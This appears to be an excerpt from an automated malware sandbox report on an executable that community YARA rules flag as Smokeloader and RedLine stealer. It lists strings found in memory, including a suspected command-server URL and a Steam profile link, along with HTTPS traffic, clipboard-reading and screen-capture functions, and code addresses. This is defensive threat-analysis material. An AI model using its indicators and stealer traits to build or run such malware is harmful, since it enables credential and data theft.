                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1587934272.0000000003049000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1560060236.0000000003049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1694322227.0000000003049000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1587934272.0000000003049000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1560060236.0000000003049000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1537846025.0000000003049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537846025.0000000003049000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apim
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badgW
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514623647.0000000003094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561343578.000000000335A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1561450032.000000000357B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1490371274.00000000009C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49711 version: TLS 1.2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004310D0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004310D0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,0_2_00431839

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000000.00000002.1693514918.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004210E00_2_004210E0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0040C9170_2_0040C917
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004361E00_2_004361E0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004152980_2_00415298
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0040B44C0_2_0040B44C
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041BEA00_2_0041BEA0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004087900_2_00408790
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004260540_2_00426054
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043B0680_2_0043B068
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004140700_2_00414070
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043C0200_2_0043C020
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004398300_2_00439830
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043D8300_2_0043D830
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041B0E10_2_0041B0E1
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041F0E00_2_0041F0E0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004358900_2_00435890
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004340980_2_00434098
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043D0A00_2_0043D0A0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004180A90_2_004180A9
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0040A9400_2_0040A940
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041714B0_2_0041714B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0042B12C0_2_0042B12C
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0042F1300_2_0042F130
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0042B1C00_2_0042B1C0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041D9E00_2_0041D9E0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004111E50_2_004111E5
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004059F00_2_004059F0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004239F20_2_004239F2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043C1F00_2_0043C1F0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0040F9FD0_2_0040F9FD
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004259900_2_00425990
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043B9A10_2_0043B9A1
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004062500_2_00406250
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041D2700_2_0041D270
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00424A740_2_00424A74
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004092300_2_00409230
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00423A340_2_00423A34
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004192DA0_2_004192DA
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043D2F00_2_0043D2F0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043C2800_2_0043C280
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004082AE0_2_004082AE
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004252BA0_2_004252BA
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041CB050_2_0041CB05
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00428BC00_2_00428BC0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004143C20_2_004143C2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00402BD00_2_00402BD0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00428BE90_2_00428BE9
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004373990_2_00437399
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004393A00_2_004393A0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00416BA50_2_00416BA5
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004293AA0_2_004293AA
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004223B80_2_004223B8
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00436C000_2_00436C00
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004234100_2_00423410
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0042B4FC0_2_0042B4FC
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00404CB00_2_00404CB0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004074B00_2_004074B0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041DD500_2_0041DD50
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004185780_2_00418578
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0042D57E0_2_0042D57E
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004245020_2_00424502
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00421D100_2_00421D10
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0040DD250_2_0040DD25
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041D5E00_2_0041D5E0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004175820_2_00417582
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043D5800_2_0043D580
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00427DA20_2_00427DA2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004205B00_2_004205B0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0042C64A0_2_0042C64A
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00426E500_2_00426E50
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0042B4F70_2_0042B4F7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043462A0_2_0043462A
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004356300_2_00435630
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004066E00_2_004066E0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0042C6E40_2_0042C6E4
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00430EF00_2_00430EF0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004256F90_2_004256F9
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00422E930_2_00422E93
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00425E900_2_00425E90
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004156A00_2_004156A0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00438EA00_2_00438EA0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00435EA00_2_00435EA0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00405EB00_2_00405EB0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041C6BB0_2_0041C6BB
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00415F660_2_00415F66
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004197700_2_00419770
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004097000_2_00409700
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0042C7260_2_0042C726
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0042C7350_2_0042C735
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041DF800_2_0041DF80
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00402FA00_2_00402FA0
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024832070_2_02483207
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024BB2CF0_2_024BB2CF
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024B42FF0_2_024B42FF
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249B3480_2_0249B348
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249734A0_2_0249734A
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024A13470_2_024A1347
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249F3470_2_0249F347
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024BD3070_2_024BD307
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024883C70_2_024883C7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024AB3930_2_024AB393
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024AF3970_2_024AF397
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024973B20_2_024973B2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024A80090_2_024A8009
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0248C0E80_2_0248C0E8
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024B11570_2_024B1157
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024A81080_2_024A8108
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024B91070_2_024B9107
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024B61070_2_024B6107
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024861170_2_02486117
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249E1E70_2_0249E1E7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249C1AC0_2_0249C1AC
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024B96070_2_024B9607
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024A96110_2_024A9611
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024AB7630_2_024AB763
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024877170_2_02487717
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024987DF0_2_024987DF
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024BD7E70_2_024BD7E7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024AD7E50_2_024AD7E5
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249144C0_2_0249144C
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024B64470_2_024B6447
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024AB4270_2_024AB427
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249D4D70_2_0249D4D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024894970_2_02489497
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024864B70_2_024864B7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024995410_2_02499541
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024BD5570_2_024BD557
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249C5280_2_0249C528
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024845D70_2_024845D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024B5AF70_2_024B5AF7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024B9A970_2_024B9A97
